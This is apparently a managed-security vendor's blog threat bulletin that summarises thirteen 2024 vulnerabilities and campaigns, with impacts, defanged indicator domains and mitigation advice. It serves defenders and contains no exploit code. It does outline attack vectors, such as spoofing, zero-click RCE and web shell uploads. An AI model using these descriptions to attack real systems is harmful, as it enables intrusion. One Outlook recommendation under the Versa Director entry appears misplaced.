Schedule a Demo

BLOG

Threat Bulletin | August 30

In our Threat Bulletins, our highly skilled Security Operations Center (SOC) team has meticulously analyzed and summarized the top threats that have been monitored over the past several weeks. Stay one step ahead of the adversaries as we delve into the ever-evolving landscape of cyber threats, uncover their tactics, and equip you with the knowledge to fortify your defenses against them.

Threat 1: Multiple SMTP Servers Vulnerable to Spoofing Attacks

Source(s): 

 

Entities:

  • SMTP Server Providers, Email Service Providers, Domain Hosting Providers 

 

Attack Vector:

  • Exploitation of vulnerabilities in the SMTP protocol, particularly involving Sender Policy Framework (SPF), Domain Key Identified Mail (DKIM), and Domain-based Message Authentication, Reporting, and Conformance (DMARC). 

 

Risk Impact:   

  • Heightened risk of phishing campaign success resulting in account compromise or monetary loss. 
  • Reputational damage from spoofed email activity. 

 

Detailed Description: 

  • Vulnerabilities CVE-2024-7208 and CVE-2024-7209 allow attackers to bypass DMARC, SPF, and DKIM email security mechanisms. 
  • CVE-2024-7208 enables an authenticated sender to spoof the identity of a shared, hosted domain, circumventing DMARC, SPF, and DKIM policies. 
  • CVE-2024-7209 exploits shared SPF records in multi-tenant hosting environments, allowing attackers to spoof email identities by leveraging network authorization.
  • The vulnerabilities stem from inadequacies in verifying authenticated senders against authorized domain identities, leading to potential email impersonation. 
  • Attackers can exploit these weaknesses to send emails as anyone within the hosted domains, bypassing security checks. 

 

Recommendations:  

  • Domain owners should adopt robust DNS-based DMARC policies, including DKIM and SPF, to protect against spoofing attacks. 
  • For enhanced identity protection, domain owners should consider using their own DKIM separate from the hosting provider. 
Threat 2: New Specula Tool Uses Outlook for Remote Code Execution in Windows

Source(s): 

 

Entities:

  • Microsoft, APT33, APT34 

Attack Vector:

  • Exploitation of CVE-2017-11774, an Outlook security feature bypass vulnerability, to turn Microsoft Outlook into a command-and-control (C2) beacon. 

 

Risk Impact:   

  • Remote execution of arbitrary code on compromised systems. 
  • Persistence and lateral movement within networks. 
  • Evasion of security software due to execution within the trusted Outlook process 

 

Detailed Description: 

  • CVE-2017-11774 is an Outlook security feature bypass vulnerability that allows attackers to create a malicious custom Outlook home page. 
  • Despite being patched in October 2017, the vulnerability persists as attackers can exploit Windows Registry values to configure Outlook’s WebView to point to a malicious site. 
  • The Specula framework demonstrates how this vulnerability can be used to set up an interactive Python web server, enabling attackers to serve and execute custom VBScript or JScript files from the compromised Outlook home page. 
  • The technique allows attackers to execute arbitrary commands with significant access to the local system and facilitates persistence and lateral movement. 
  • Attackers leverage Outlook’s trusted process to evade detection by security software 
  • CVE-2017-11774 has been used in targeted attacks against U.S. government agencies, with notable adoption by the Iranian-sponsored APT33 and APT34 cyber espionage groups. 
  • FireEye and other security researchers observed its use in broader campaigns starting in mid-2018. 

 

Recommendations:  

Threat 3: Critical Zero-Click RCE Vulnerability in Microsoft Outlook (CVE-2024-38021)

Source(s):  

 

Entities:   

  • Microsoft, Morphisec 

 

Attack Vector:  

  • Exploitation occurs via malicious image tags in Microsoft Outlook emails, leveraging unsafe parsing of composite monikers to achieve remote code execution (RCE). 

 

Risk Impact:  

  • Remote code execution (RCE) 
  • NTLM credential leakage 
  • Potential unauthorized control over affected systems 
  • Stealing sensitive information without user interaction. 

 

Detailed Description: 

  • CVE-2024-38021 is a critical vulnerability in Microsoft Outlook affecting how hyperlink objects are processed within image tags in emails.
  • Attackers can exploit this flaw to embed composite monikers in image URLs, triggering unsafe parsing and allowing remote code execution.
  • Despite a previous patch for a related vulnerability (CVE-2024-21413), the issue persists due to incomplete mitigation, as the HrPmonFromUrl method did not incorporate the security flag intended to block unsafe parsing. 

 

Recommendations:  

  • Ensure that the BlockMkParseDisplayNameOnCurrentThread flag is implemented and active in all relevant functions. 
  • Regularly monitor and apply security updates for Office applications. 
Threat 4: Critical Zero-Click RCE Vulnerability in Windows TCP/IP Stack

Source(s): 

 

Entities:  

  • Microsoft Windows 
  • TCP/IP Stack 
  • IPv6 

 

Attack Vector:  

  • Remote Code Execution (RCE) via an integer underflow vulnerability in the Windows TCP/IP stack, specifically targeting systems with IPv6 enabled. 

 

Risk Impact:  

  • System Compromise: The CVE-2024-38063 vulnerability allows remote, unauthenticated attackers to execute arbitrary code with SYSTEM privileges on any Windows system with IPv6 enabled. This could result in full system compromise, enabling attackers to install malware, exfiltrate data, or use the compromised machine to launch further attacks within a network. 
  • Wormable Threat: The vulnerability is considered “wormable,” meaning it could enable malware to spread automatically across networks without user interaction, similar to the infamous WannaCry ransomware. This significantly heightens the potential impact, especially in environments with interconnected systems. 

 

Detailed Description: 

  • CVE-2024-38063 is a critical vulnerability in the Windows TCP/IP stack with a maximum CVSSv3 score of 9.8. The flaw stems from an integer underflow issue that can be exploited by sending specially crafted IPv6 packets to a target system, resulting in a buffer overflow. Successful exploitation allows attackers to execute arbitrary code remotely on affected Windows 10, Windows 11, and Windows Server systems, including Server Core installations. 
  • Zero-Click Exploit: This is a zero-click vulnerability, meaning it requires no user interaction for the attack to succeed. An attacker can remotely exploit this flaw simply by sending crafted IPv6 packets. Microsoft has rated this vulnerability as “Exploitation More Likely,” indicating a high potential for attackers to develop reliable exploits quickly. 
  • Historical Context and Similar Vulnerabilities: 
    • CVE-2020-16898/9 (Ping of Death): Allowed RCE and DoS attacks using ICMPv6 Router Advertisement packets. 
    • CVE-2021-24086: Involved an IPv6 fragmentation bug that left Windows systems vulnerable to DoS attacks. 
    • CVE-2023-28231: A DHCPv6 flaw enabling RCE with a specially crafted call. 
  • These historical vulnerabilities demonstrate the ongoing risks associated with the IPv6 protocol in Windows, making timely patching and monitoring critical. 

 

Recommendations: 

  • Apply the Latest Microsoft Security Updates Immediately: 
  • Microsoft released a patch on August 13, 2024, that addresses CVE-2024-38063. It is essential that all affected systems are updated as soon as possible, with priority given to those exposed to the internet. 
  • Consider Disabling IPv6 Temporarily: 
    • For organizations unable to apply the patch immediately, disabling IPv6 can remove the attack vector. However, this action should be taken with caution, as IPv6 is a core component of Windows, and disabling it may impact system functionality. 
  • Implement Network Segmentation: 
    • Network segmentation can limit lateral movement within an organization, helping contain any potential spread of malware if a system is compromised.
Threat 5: Microsoft Discovers Critical OpenVPN Vulnerabilities Leading to RCE and LPE

Source(s): 

 

Entities:   

  • OpenVPN, Microsoft, Windows 

 

Attack Vector:  

  • User Authentication Required: Attackers need valid user credentials, which may be obtained through methods such as purchasing on the dark web, using info stealers, or capturing NTLMv2 hashes. 
  • Exploitation: The vulnerabilities are exploited by chaining multiple bugs to achieve Remote Code Execution and Local Privilege Escalation. 

 

Risk Impact:  

  • Full Control: Potential for complete control over targeted endpoints. 
  • Data Breaches: Risk of unauthorized access to sensitive information. 
  • System Compromise: Potential for system-wide compromise and manipulation. 
  • Bypassing Security: Ability to disable or bypass security measures like Microsoft Defender. 

 

Detailed Description: 

  • Microsoft has identified four vulnerabilities in OpenVPN, affecting various platforms including Windows, Android, iOS, macOS, and BSD.  
  • These vulnerabilities, when chained together, can lead to severe security issues such as remote code execution (RCE) and local privilege escalation (LPE).  
  • The vulnerabilities include two CVEs related to OpenVPN’s Windows service, which can lead to unauthorized access and remote code execution.  
  • Additionally, flaws in the Windows TAP driver can cause a denial of service. 
  • Exploitation requires user credentials and a deep understanding of OpenVPN’s internals.  Attackers can leverage these vulnerabilities to gain full control over systems, potentially leading to data breaches and system compromise. 

 

Recommendations:  

Threat 6: FreeBSD Releases Urgent Patch for High-Severity OpenSSH Vulnerability

Source(s): 

 

Entities: 

  • OpenSSH 

 

Attack Vector:  

  • Remote Code Execution via Race Condition in OpenSSH (sshd) exploiting the CVE-2024-7589 vulnerability in FreeBSD. 

 

Risk Impact:   

  • Allows attackers to remotely execute arbitrary code with elevated privileges (root access) on systems running the affected version of OpenSSH. This can lead to complete system compromise, allowing attackers to install malware, exfiltrate data, or further propagate attacks within the network. 

 

Detailed Description: 

  • The vulnerability (CVE-2024-7589) in OpenSSH, which carries a CVSS score of 7.4, is a high-severity flaw that affects the FreeBSD operating system.  
  • The issue arises from a race condition due to a signal handler in sshd (8) calling a logging function that is not async-signal-safe.  
  • The signal handler is triggered when a client fails to authenticate within the LoginGraceTime (120 seconds by default).  
  • Since sshd (8) runs with root privileges and is not sandboxed, this race condition could allow an unauthenticated attacker to execute code remotely with root privileges. 
  • This vulnerability is related to a previously identified flaw, known as regreSSHion (CVE-2024-6387), stemming from the integration of blacklistd in OpenSSH in FreeBSD.  
  • The exploitation of this flaw could enable attackers to gain full control of the affected system. 

 

Recommendations:  

  • Update: FreeBSD users should immediately apply the latest security patches and updates provided by the FreeBSD Project to mitigate this vulnerability. 
  • Temporary Mitigation: If updating is not possible, set LoginGraceTime to 0 in /etc/ssh/sshd_config and restart sshd (8). This will protect against remote code execution but could expose the system to denial-of-service attacks. 
Threat 7: Microsoft Discloses Office Zero-Day, still working on a Patch

Source(s):  

 

Entities

  • Microsoft Office 2016 and later (Office 2016, Office 2019, Office LTSC 2021, Microsoft 365 Apps for Enterprise)

 

Attack Vector:  

  • Exploitation of a zero-day information disclosure vulnerability via specially crafted files or compromised websites. 

 

Risk Impact: 

  • Unauthorized access to protected information such as system status, configuration data, personal information, or connection metadata. Although exploitation likelihood is assessed as less likely by Microsoft, MITRE considers it highly probable. 

 

Detailed Description: 

  • Vulnerability Identifier: CVE-2024-38200. 
  • Affected Versions: Multiple 32-bit and 64-bit Office versions including Office 2016, Office 2019, Office LTSC 2021, and Microsoft 365 Apps for Enterprise. 
  • Vulnerability Type: Information disclosure weakness. 
  • Exploit Scenario: In a web-based attack scenario, an attacker could: 
  • Host a malicious website or leverage a compromised site hosting user-provided content. 
  • Create a specially crafted file designed to exploit the vulnerability. 
  • The attacker must convince the user to visit the website and open the malicious file, typically via email or Instant Messenger. 
  • Current Status: Microsoft is developing security updates but has not announced a release date. 
  • Further Disclosure: More details about the vulnerability will be shared by Jim Rush in a “NTLM – The Last Ride” Defcon talk, which will cover new bugs and techniques, including those bypassing existing CVE fixes. 

 

Recommendations: 

  • Monitor for security updates from Microsoft and apply them as soon as they are released. 
  • Be cautious of unsolicited links and attachments in emails or messages to mitigate potential exploitation. 
Threat 8: Exploit for Cisco SSM Vulnerability Enabling Admin Password Modifications

Source(s): 

 

Entities:

  • Cisco Smart Software Manager On-Prem (SSM On-Prem) 

 

Attack Vector:  

  • Crafted HTTP requests exploiting unverified password change vulnerability  

 

Risk Impact:   

  • Allows attackers to remotely change any user password, including administrator accounts, potentially compromising the entire system. 

 

Detailed Description: 

  • A severe vulnerability (CVE-2024-20419) in Cisco SSM On-Prem allows unauthenticated attackers to remotely change user passwords, including those for administrator accounts, via crafted HTTP requests.  
  • The vulnerability stems from improper implementation in the password-change process, enabling unauthorized access to the web UI or API with the privileges of the compromised user. 

 

Recommendations:  

  • Admins should immediately upgrade to the fixed release, as there are no workarounds available. 
Threat 9: CISA Warns of Hackers Abusing Cisco Smart Install Feature

Source(s): 

 

Entities:

  • Cisco Smart Install (SMI) Protocol  

 

Attack Vector:  

  • Exploitation of the legacy Cisco Smart Install protocol. 

 

Risk Impact:  

  • Potential for sensitive data theft, unauthorized configuration changes, rogue account creation, and system compromise. 

 

Detailed Description: 

  • The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued an alert recommending the disabling of the legacy Cisco Smart Install (SMI) feature, which is being actively abused in recent cyberattacks.  
  • Threat actors are leveraging this protocol to steal sensitive data and compromise network devices.
  • The SMI feature has a history of being targeted by hacking groups due to misconfiguration or failure to disable it, leading to serious security breaches.

 

Recommendations: 

  • Admins should immediately disable the legacy SMI protocol and review additional guidance provided by the NSA to secure network infrastructure. 
Threat 10: Cisco Warns of Critical RCE Zero-Days in End-of-Life IP Phones

Source(s): 

 

Entities:

  • Cisco Small Business SPA 300 and SPA 500 Series IP Phones 

 

Attack Vector:  

  • Specially crafted HTTP requests targeting the web-based management interface 

 

Risk Impact:  

  • Allows remote, unauthenticated attackers to execute arbitrary commands with root privileges or cause denial of service on vulnerable devices. 

 

Detailed Description: 

  • Cisco has issued a warning about several critical remote code execution (RCE) zero-day vulnerabilities in the end-of-life Small Business SPA 300 and SPA 500 series IP phones.  
  • These flaws include three critical buffer overflow vulnerabilities (CVE-2024-20450, CVE-2024-20452, CVE-2024-20454) that allow remote attackers to execute arbitrary commands with root privileges.  
  • Additionally, two high-severity flaws (CVE-2024-20451, CVE-2024-20453) could enable denial of service attacks.  
  • With no patches or workarounds available, affected users must transition to newer, supported models. 

 

Recommendations: 

  • Users should immediately migrate to newer, supported Cisco IP phone models, such as the Cisco IP Phone 8841 or models from the Cisco 6800 series. 
Threat 11: Windows Zero-Day Flaw Lets Hackers Downgrade Fully Updated Systems to Old Vulnerabilities

Source(s): 

 

Entities:

  • Windows 10, Windows 11, Windows Server 

 

Attack Vector:  

  • Exploitation of zero-day vulnerabilities to downgrade OS components via the Windows Update process 

 

Risk Impact:  

  • Allows attackers to reintroduce old vulnerabilities, bypass security features, and compromise fully patched systems, making them susceptible to thousands of past security flaws. 

Detailed Description: 

  • SafeBreach security researcher Alon Leviev revealed at Black Hat 2024 that two zero-day vulnerabilities (CVE-2024-38202 and CVE-2024-21302) in Windows Update could be exploited to perform downgrade attacks on fully updated Windows systems.  
  • These attacks force devices to revert to older, vulnerable versions of OS components, making them susceptible to exploitation.  
  • This “Windows Downdate” attack is particularly dangerous because it is undetectable and leaves systems vulnerable to a wide range of old security flaws, rendering the concept of being “fully patched” meaningless. 
  • Microsoft states that they are working on an update that will revoke outdated, unpatched VBS systems files to mitigate the attack, however this will take time to test this update. 

 

Recommendations: 

Threat 12: Advanced Tycoon 2FA Phishing Campaign Exploits Amazon SES and Complex Redirects for Credential Theft

Source(s): 

 

Entities:   

  • Amazon SES, Tycoon 2FA Phish-kit 

 

IOCs: 

  • Domains: 
    • v4l3n[.]delayawri[.]ru  
    • keqil[.]ticemi[.]com  
    • auto[.]economictimes[.]indiatimes[.]com  
    • b2bimg[.]economictimes[.]indiatimes[.]com  
    • cfo[.]economictimes[.]indiatimes[.]com  
    • cio[.]economictimes[.]indiatimes[.]com  
    • energy[.]economictimes[.]indiatimes[.]com  
    • realty[.]economictimes[.]indiatimes[.]com  
    • static[.]economictimes[.]indiatimes[.]com  
    • telecom[.]economictimes[.]indiatimes[.]com  
    • ciso[.]economictimes[.]indiatimes[.]com  
    • brandequity[.]economictimes[.]indiatimes[.]com 
  • Redirect Domains: 
    • clicktime[.]symantec[.]com  
    • away[.]vk[.]com   
    • brandequity[.]economictimes[.]indiatimes[.]com  
    • jyrepresentacao[.]com  
    • t4yzv[.]vereares[.]ru  
    • challenges[.]cloudflare[.]com 

 

Attack Vector:  

  • Phishing emails sent through Amazon SES, containing fake document review requests. 
  • Use of complex URL redirects to obscure the final phishing site. 
  • Exploitation of multiple compromised domains and CDN services to deliver phishing content. 

 

Risk Impact:  

  • Credential Theft: Users’ credentials are at risk as phishing forms capture sensitive information. 
  • Reputation Damage: Compromised domains and services used in the attack can damage their reputation. 
  • Financial Loss: Potential for financial loss due to credential theft leading to unauthorized access. 

 

Detailed Description: 

  • The Tycoon 2FA Phish-kit utilizes Amazon SES to send phishing emails that appear legitimate due to valid signatures.  
  • These emails contain misleading content and redirect victims through a complex series of URLs.  
  • The phishing engine is obfuscated and communicates with a C2 server to collect stolen data.  
  • The attack involves various compromised and redirect domains and multiple content delivery networks and services to obfuscate it further. 

 

Recommendations:  

  • Users should be cautious of unexpected email attachments and verify the legitimacy of links before clicking. 
  • Regularly update and review email filtering rules to identify and block phishing emails.
Threat 13: Volt Typhoon Exploits Versa Director Flaw, Targets U.S. and Global IT Sectors

Source(s):  

 

Entities:   

  • U.S. Internet Service Providers (ISP), Managed Service Providers (MSP), Global IT sectors, Versa Director users (including companies like Adobe, Barclays, T-Mobile, and Verizon) 

 

Attack Vector:  

  • Zero-day vulnerability (CVE-2024-39717) in Versa Director, exploited to upload malicious files. 

 

Indicators of Compromise:  

  • Malicious PNG image files used in “Change Favicon” functionality 
  • Web shell named “VersaMem” disguised as “VersaTest.png” 
  • Network traffic from SOHO devices to Versa Director servers on ports 4566 and 4570 

 

Risk Impact:  

  • Compromise of administrative credentials 
  • Supply chain attacks targeting downstream customers 
  • Potential unauthorized access to critical infrastructure 

 

Detailed Description: 

  • CVE-2024-39717: A file upload vulnerability in Versa Director, allowing attackers to upload malicious files with administrative privileges. 
  • Attackers exploited this flaw to deliver a custom web shell (“VersaMem”) designed to intercept and harvest credentials. 
  • The web shell is modular and operates in-memory, evading traditional file-based detection. 
  • Initial indicators of exploitation were identified as early as June 12, 2024, with the campaign believed to be ongoing. 
  • The earliest web shell sample was detected from Singapore on June 7, 2024. 
  • The attack primarily targets unpatched Versa Director systems, emphasizing the importance of timely updates. 

 

Recommendations:  

  • Update Microsoft Outlook to the latest version to apply the provided patch. 
  • Apply the latest patches for Versa Director (version 22.1.4 or later). 
  • Block external access to ports 4566 and 4570 on Versa Director servers. 
  • Conduct recursive searches for suspicious PNG files on affected systems. 
  • Monitor and analyze network traffic originating from SOHO devices to Versa Director ports. 
  • Enhance monitoring of authentication processes on Versa Director to detect potential credential harvesting. 

950A Union Road, Suite 103
West Seneca, NY 14224
P: 877.729.3527
E: [email protected]

Facebook-f Linkedin Youtube

Channel Futures MSP 501 Winner| MSSP Alert Top 250 MSSP Winner| Inc. Regionals Northeast Winner| Inc. 5000 Winner

© 2024 CyFlare
| All Rights Reserved | Legal | Accessibility

Website Developed by Mason Digital